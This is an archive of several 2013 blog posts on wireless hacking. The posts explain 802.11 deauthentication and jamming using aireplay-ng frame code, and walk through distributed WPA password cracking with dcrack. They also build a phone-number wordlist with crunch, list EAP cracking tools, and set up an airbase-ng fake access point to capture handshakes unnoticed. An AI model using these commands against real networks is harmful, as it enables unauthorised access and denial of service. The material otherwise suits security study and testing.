Wednesday, October 30, 2013

WIRELESS JAMMING !!

What is jamming?

Jamming is any attack to deny service to legitimate users by generating noise or fake protocol packets or legitimate packets but with spurious timing. A particular class of Denial of Service (DoS) attacks is also considered as jamming. The most trivial way of disrupting a wireless network is by generating a continuous high power noise across the entire bandwidth near the transmitting and/or receiving nodes. The device that generates such a noise is called a Jammer and the process is called Jamming
However, jamming can be made more energy efficient and less detectable if the jammer operates using knowledge of the protocol. Jammers which jam the network with the knowledge of the protocol, are termed as protocol aware jammers
The Wireless Signal Jammer Device can be used to temporarily stop transmission, temporarily short out or turn off the power during the usage of units. These include Radios, Televisions, Microwaves, or any unit that receives electrical signals for operation.

Is Wireless network secured enough from Jamming?

NO

Since the ratification of the IEEE 802.11i in 2004, organisations have been able to improve security on their wireless networks by making use of CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code protocol). CCMP uses AES (Advanced Encryption Standard) as opposed to the RC4 streaming cipher found in implementations of WEP (Wired Equivalent Privacy) and TKIP (Temporal Key Integrity Protocol). However, the protection offered by 802.11i applies only to data frames and does not provide any protection over the management frames.

Why am i talking about "Management Frames" ?

It is these management frames that are insecure and can lead to DoS attacks against an organisation’s wireless network. Unencrypted management frames can disclose important pieces of information to an attacker, including details about the type of wireless equipment in use on the wireless network and configuration settings.

What are Management Frames?

802.11 management frames enable stations to establish and maintain communications. Management packets are used to support authentication, association, and synchronization.

Layer 2 DoS (Jamming using Layer 2 [protocol aware jamming] )

On an 802.11 network, an attacker can transmit packets using a spoofed source MAC address of an access point. The recipient of these spoofed frames has no way of telling if they are legitimate or illegitimate requests and will process them. The ability to transmit spoofed management frames allows MAC layer DoS attacks to take place. 

Two such MAC layer attacks are :
Authentication/Association flood attack : During the authentication/association flood attack, an attacker uses spoofed source MAC addresses that attempt to authenticate and associate to a target access point. The attacker repeatedly makes authentication/association requests, eventually exhausting the memory and processing capacity of the access point leaving clients with little or no connection to the wireless network.
Authentication Packet : Authentication packets are sent back and forth between the station requesting authentication and the station to which it is attempting to assert its authentic identity. The number of packets exchanged depends on the authentication method employed. Information relating to the particular scheme is carried in the body of the Authentication packet.

The aireplay-ng source-code defining the Authentication request [Line no. 88 (aireplay-ng.c)]

#define AUTH_REQ \ "\xB0\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \ "\xBB\xBB\xBB\xBB\xBB\xBB\xB0\x00\x00\x00\x01\x00\x00\x00"

Function(aireplay-ng.c) : do_attack_fake_auth()

Sample code for "-1" option in aireplay-ng

        else if(i==1) //attack -1 (open)
            {
                memcpy( h80211, AUTH_REQ, 30 ); //Authentication request data
                memcpy( h80211 +  4, opt.f_dmac, 6 );
                memcpy( h80211 + 10, opt.f_smac , 6 );
                memcpy( h80211 + 16, opt.f_bssid, 6 );
                opt.f_iswep = 0;
                opt.f_tods = 0; opt.f_fromds = 0; // Not Leaving DS
                opt.f_minlen = opt.f_maxlen = 30;
            }


Tools : Void11,mdk3,aireplay-ng etc..

Deauthentication/Disassociation flood attacks : In a deauthentication/disassociation flood attack, an attacker transmits spoofed frames with the source address of the access point. When the recipient receives the frames, they will disconnect from the network and attempt to reconnect. If the attack is sustained, the clients will be unable to maintain a connection to the wireless network. The deauthentication/disassociation flood attack targets one or all users on a specific BSSID (MAC address of the access point).
Deauthentication Packet : This packet is an announcement stating that the receiver is no longer authenticated. It is a one-way communication from the authenticating station (a BSS or functional equivalent), and must be accepted. It takes effect immediately.

The aireplay-ng source-code defining the Deauthentication request [Line no. 84 (aireplay-ng.c)]

#define DEAUTH_REQ      \
"\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \
"\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"

Function(aireplay-ng.c) : do_attack_deauth()

Sample code for "-0" option in aireplay-ng


if(i==0) //attack -0
           {
               memcpy( h80211, DEAUTH_REQ, 26 ); // Deauthentication data
               memcpy( h80211 + 16, opt.f_bssid, 6 ); 
               memcpy( h80211 +  4, opt.f_dmac,  6 ); 
               memcpy( h80211 + 10, opt.f_smac, 6 ); 

               opt.f_iswep = 0;
               opt.f_tods = 0; opt.f_fromds = 0; // Not Leaving DS
               opt.f_minlen = opt.f_maxlen = 26; 
           }


Tools : file2air, mdk3, aireplay-ng etc..

Layer 1 DoS (jamming using Layer 1 [RF Noise Jamming] )

A physical layer attack on a wired network ideally requires the attacker to be inside or very close to the target wireless network. Any network that relies on a shared medium is subject to DoS attacks from other devices sharing the same medium. When one device saturates the medium, other clients will find it difficult to communicate. 
An attacker using a laptop equipped with a high output wireless client card and a high gain antenna can launch a physical medium attack on an organisation’s wireless network by generating enough RF noise to reduce the signal-to-noise ratio to an unusable level by saturating the 802.11 frequency bands. The jamming device could also be a custom built transmitter. For example, a Power Signal Generator (PSG) that is used to test antennas, cables and connectors for wireless devices can be turned into a wireless jamming device, when connected to a high gain antenna. 

Wednesday, July 17, 2013

DCRACK - DISTRIBUTED WIRELESS PASSWORD CRACKING


Hello guys,

With the New Update from Aircrack-Suite, its now possible to use others system for the processing power.
(i know that CPU cracking is an old school technique but this tool is really fun :P)
with the new tool introduced in the aircrack suite, dcrack has the ability to perform Wireless Password Cracking in a Distributed Computing Environment. Isn't its COOL !! :D

ok then lets see how can we work on dcrack. (i just tired it now but i think its an AWESOME tool !! )



Note: I did not test this in a Fully Functioning Lab, I did the testing on VMware Workstation with 4 OS Running ( 1 User, 1 Server, 2 Clients).




STEP 1 - INSTALL AIRCRACK SUITE

Just refer to the aircrack website (http://www.aircrack-ng.org/install.html) for this.


STEP 2 - RUN DCRACK

To run dcrack, you need to know the working of dcrack



































As we know now that dcrack utilizes the concept of Distributed Computing, so dcrack need three things :


A User

The User requests the server to crack the wireless password for him/her. The user will send the ".cap" file and a dictionary file (wordlist) to the server for cracking.



A Server

The server will be used as a Command Center. All the instructions, related to cracking will be given from here. The server will process the user's request for cracking and pass the instructions to the Clients.



Clients

Clients are responsible for do the dirty work !!
they use their processing power to crack the password using the wordlist given by the User.



 To run dcrack, we need to go to the location where dcrack is located. so now in the terminal we'll go to :
/pentest/wireless/aircrack-ng/scripts/

First, the server needs to be start. Run the below given command to start the dcrack server. 
python dcrack.py server



-------------------------------------------------

NOTE:



DCRACK SERVER IP :   192.168.1.128

CLIENT 1 IP:   192.168.1.131
CLIENT 2 IP:   192.168.1.133
USER IP :   192.168.1.132
MAC ADDR OF THE AP : 00:0d:93:eb:b0:8c
-----------------------------------------------------------



Second, the user needs to send the .cap file and the wordlist for the cracking to the server.
python dcrack.py cmd 192.168.1.128 cap /root/test.cap
python dcrack.py cmd 192.168.1.128 dict /root/password.lst




USER LOG ON SERVER (user sending the files to the server)



NOTE: The wordlist and the .cap file are compressed first to reduce the size to send it over the network. 

Third, Both the clients  (CLIENT 1 and CLIENT 2) needs to tell the server that its available for cracking. 
python dcrack.py client 192.168.1.128


CLIENT 1



CLIENT 1 LOG ON SERVER



CLIENT 2



 CLIENT 2 LOG ON SERVER








Now, the user needs to send the cracking request to the server
python dcrack.py cmd 192.168.1.128 crack  00:0d:93:eb:b0:8c





USER LOG ON SERVER






Once the user requests the server for cracking, the Clients will start downloading the wordlist and the .cap file from the server. Clients then uncompresses the files and then Splits the Wordlist in 2 parts (as we have 2 clients here) and then starts the cracking using their computing power.


CLIENT 1



CLIENT 2



CLIENT 1 LOG ON SERVER (Client sending the password to the server)



as you all can see above, CLIENT 1 found the key from the wordlist.


The user can check the status of the cracking using the below command :

python dcrack.py cmd 192.168.1.128 status







Phew !!
Too Long ... ha ha :D

That's all guys... i hope you like it.



















Thursday, May 16, 2013

EXPERIMENT -- Connecting Alfa card with the "Satellite dish antenna"


Yesterday i was just experimenting on alfa card and the things that i found was quite exciting.

I removed the antenna of the alfa card and i connected my alfa card with my Laptop without the antenna to check the networks in the vicinity.



i got only a single network and  that was my home wireless network.



The airodump result :



 Signal and Noise Level:




After that i Followed these steps:

1. I Removed the dish antenna cable connecting to the set top box.

2. I binded the male type connector of the satellite dish antenna (connecting to the set top box) with the copper wire (which is used in the earphone) using a plastic Clip.

3. I then binded the other end of the copper wire  with the alfa card male type connector.




Now i know its kind of weird but after configuring this setup, i connected the alfa card with my Laptop and guess what? i was able to get 3 networks with a high range.





Airodump result:



Signal and Noise Level :



Am still doing some experiments to increase the gain for the antenna

Tuesday, April 16, 2013

WPA/WPA2 cracking dictionary. Human Stupidity !!


Hi guys,

I have seen so many threads related to WPA cracking using dictionary so i thought i should share some of my techniques by which you can increase the chance of getting the WPA/WPA2 password.

In India (as i don't know about other countries), i have seen many people using wifi with WPA/WPA2 encryption enabled which is good actually. ya i know that its hard for a hacker to crack WPA/WPA2 password when he/she doesn't have a proper dictionary but there is one thing that many guys do forget, its the "Human Stupidity" Factor :D

People may have secure their wifi with WPA/WPA2 encryption but one thing that i noticed till now is that many people choose their wifi password as their own mobile number or their gf, wife, parents, relatives mobile number.
We only need to create a dictionary which will consist of all the mobile numbers. You think it's hard?

Actually its kinda easy !! :D :D

thinking how?

Lets see,

what i said earlier that people chooses mobile number for their password, so we'll create a dictionary containing the mobile numbers.

now lets say there's a phone number like 9876543211

(there are many series like 99XX, 98XX, 97XX etc.)

we just need to create dictionary starting with number 9 (for the 9 Series of numbers. for 7 or 8 series of numbers u can add 7 or 8 also) like 900 till 99 but here you only need to chance the other 9 digits except the 1st digit. 

For creating dictionary you can use "crunch" (a really nice tool). the total size for 10 digit numbers 0987654321 is 102GB but you need to create dictionary for only 9 digits as the 1st digit will remain the same. so now the size would be only 10GB.


how to use crunch to create this kinda dictionary?

Lets see then,

first you need to go to the 

/pentest/passwords/crunch/ directory

then you have to type

 ./crunch 10 10 -t 9%%%%%%%%% -o wordlist.lst

what your asking crunch to do is to create a dictionary with minimum  and maximum 10 digits and also no need to change the 1st digit as it will remain same and change the other 9 digits accordingly and finally store the file (in this case its wordlist.lst)

the above code will generate a dictionary of 10GB in size which you can use to crack WPA/WPA2 passwords.

that's all !

Saturday, March 23, 2013

RADIUS Server !!





What is a RADIUS server?
its a server which is used to authenticate clients using the RADIUS (Remote Authentication Dial In User Service) client/server protocol. it uses a AAA (Authentication, Authorization, Accounting) concept. RADIUS servers are used by many companies, organizations, universities and especially ISPs. When you dial in to the ISP you must enter your username and password. This information is passed to a RADIUS server, which checks that the information is correct, and then authorizes access to the ISP system. it uses UDP ports 1812 for RADIUS Authentication and 1813 for RADIUS Accounting.

Why RADIUS server used?
RADIUS serves three functions:
1. to authenticate users or devices before granting them access to a network,
2. to authorize those users or devices for certain network services and
3. to account for usage of those services.

RADIUS server in Wireless Networks.
RADIUS server used in wireless networks manages the wireless clients. for wireless, it uses 802.1X authentication scheme. The big advantage of WPA/WPA2-RADIUS authentication is that wireless encryption keys are issued by the RADIUS server and are unique to each connection and session. That eliminates distributing a shared key to all users, which might easily be compromised. The RADIUS protocol does not transmit passwords in cleartext between the NAS and RADIUS server. Rather, a shared secret is used along with the MD5 hashing algorithm to obfuscate passwords.

Difference between WPA-Enterprise and WPA2-Enterprise.
The main difference between WPA-Enterprise and WPA2-Enterprise is the same as WPA & WPA2-Personal except that in Enterprise both needs a RADIUS server to authenticate the client.
*NOTE  WPA uses TKIP Cipher with MD5 hashing algorithm but WPA2  uses AES-CCMP Cipher with SHA1 hashing algorithm.
Its mostly recommended to choose WPA2-Enterprise over WPA-Enterprise.

Types of Authentication Mechanism in RADIUS server.
There are many authentication mechanisms in RADIUS server but the most common and widely used are as follows:
EAP-MD5
LEAP 
EAP-TLS
PEAP
EAP-TTLS and 
EAP-FAST  


EAP-MD5
EAP-MD5-Challenge enables a RADIUS server to authenticate a connection request by verifying an MD5 hash of a user's password. The server sends the client a random challenge value, and the client proves its identity by hashing the challenge and its password with MD5. EAP-MD5-Challenge is typically used on trusted networks where risk of packet sniffing or active attack are fairly low. Because of significant security vulnerabilities, EAP-MD5-Challenge is not usually used on public networks or wireless networks, because third parties can capture packets and apply dictionary attacks to identify password hashes. Because EAP-MD5-Challenge does not provide server authentication, it is vulnerable to spoofing (a third party advertising itself as an access point).
Tool to crack this authentication mechanism : eapmd5pass, eapmd5crack

By default, the EAP-MD5-Challenge password protocol is available for use by the Native and Unix authentication methods.


LEAP (Lightweight Extensible Authentication Protocol)
LEAP was developed by Cisco Systems. LEAP uses a modified version of MS-CHAP( Microsoft version of the Challenge-Handshake Authentication Protocol), an authentication protocol in which user credentials are not strongly protected and are thus easily compromised.
Tool to crack this authentication mechanism : ASLEAP, THC-leapcracker

Cisco recommends to use newer and stronger EAP protocols such as EAP-FAST, PEAP, or EAP-TLS.


EAP-TLS (EAP-Transport Layer Security)
EAP-TLS uses the Transport Layer Security (TLS) protocol. EAP-TLS require the client to use X.509 certificates. TLS is generally accepted as the most secure, because it depends on certificates. A compromised password is not enough to break into EAP-TLS enabled systems because the intruder still needs to have the client-side private key(Certificate). The highest security available is when client-side keys are housed in "smart cards". This is because there is no way to steal a certificate's corresponding private key from a smart card without stealing the card itself.


PEAP (Protected Extensible Authentication Protocol)
PEAP is similar to EAP-TTLS. It encapsulates EAP within a potentially encrypted and authenticated Transport Layer Security (TLS) tunnel. PEAP requires only a server-side PKI (Public Key Infrastructure) certificate to create a secure TLS tunnel to protect user authentication, and uses server-side public key certificates to authenticate the server. It then creates an encrypted TLS tunnel between the client and the authentication server.
Tool to crack this authentication mechanism : ASLEAP


EAP-TTLS (EAP-Tunneled Transport Layer Security)
EAP-TTLS (Tunneled Transport Layer Security) is designed to provide authentication that is as strong as EAP-TLS, but it does not require that each user be issued a certificate. Instead, only the authentication servers are issued certificates. User authentication is performed by password, but the password credentials are transported in a securely encrypted tunnel established based upon the server certificates. It does not require the client be authenticated to the server with a digitally signed certificate by the CA. The server uses the secure TLS tunnel to authenticate the client with password and key exchange mechanism. TTLS implementations today support all methods defined by EAP, as well as several older methods
(CHAP, PAP, MS-CHAP and MS-CHAPv2).
Tool to crack this authentication mechanism : ASLEAP


EAP-FAST (EAP-Flexible Authentication via Secure Tunneling)
It was a replacement for LEAP. EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified. When automatic PAC provisioning is enabled, EAP-FAST has a slight vulnerability that an attacker can intercept the PAC and subsequently use that to compromise user credentials. There is also a vulnerability where an attacker's AP can use the same SSID, reject the users PAC and supply a new one. Most supplicants can be set to prompt the user this credentials using the inner method to the hacker, who will then get either a cleartext password or a vulnerable to dictionary attack MSCHAPv2 hash.


Reference: Google :D



Sunday, March 3, 2013

ANOTHER EASY WAY TO GET THE WPA HANDSHAKE

Hey guys,

here's my another tutorial on how to get the WPA HANDSHAKE (for cracking WPA encryption) in an VERY EASY WAY !!


PRE-REQUISITES



# You Should have a wireless card which supports "PACKET INJECTION".

# Your wireless card should be on the monitor mode (Recommended) 

# Naaaaaa that's all :P



ok then Lets Start...


# Run airodump-ng to start monotoring the air.

airodump-ng mon0

if you have wireless networks in the vicinity then you'll be able to see a list of networks.


# choose a network for which you want to get the WPA HANDSHAKE.



#After Selecting the Network, you need the following info. from that network :



BSSID (MAC Address of the AP)
ESSID (Name of the AP)
CHANNEL
CIPHER TYPE

# Now open a new terminal and type the following command:

airbase-ng -a <bssid> --essid "<essid>" -c <channel> -F <location> -v -z 4 -V 3 -P -I 10 -C 15 mon0

-a bssid         : set Access Point MAC address
-v                  : verbose (print more messages)
-c channel     : sets the channel the AP is running on
-z type          : sets WPA1 cipher tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type         : same as -z, but for WPA2
-V type        : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix      : write all sent and received frames into pcap file
-P                : respond to all probes, even when specifying ESSIDs
-I interval     : sets the beacon interval value in ms
-C seconds  : enables beaconing of probed ESSID values (requires -P)

#Airbase is a tool used for creating a fake AP. Here create the fake AP with the same BSSID, ESSID, CHANNEL and CIPHER type as the network's that you want to get the WPA HANDSHAKE from.

in the above, i used the "-z 4" switch which tells that the network has a CCMP cipher type and in "-V 3", i am generating fake EAPOL packets.


#Now comes the Signal Game, if you have a higher signal strength than the other network, then without even deautheticating the clients, you'll get the WPA HANDSHAKE.


"Here is the best part, the client will not even know that his/her network is under attack :D :D
because we are not deauthenticating him/her from the AP  :D :D"


here you see "Client <client_mac> is associated (WPA1:CCMP) to BSSID: <essid> "

this means that the client is connected with your fake AP and we have just received the WPA handshake (You still need atleast 3-4 messages like that to properly get the WPA handshake)

# now just close it... your done !! :P


#for checking if we got the WPA handshake or not, run this command:

aircrack-ng <location of the pcap file> -w <wordlist>



as you can see here, i have got a handshake 




That's all ...


i hope its helpful to you all :-)




Thanks for reading !!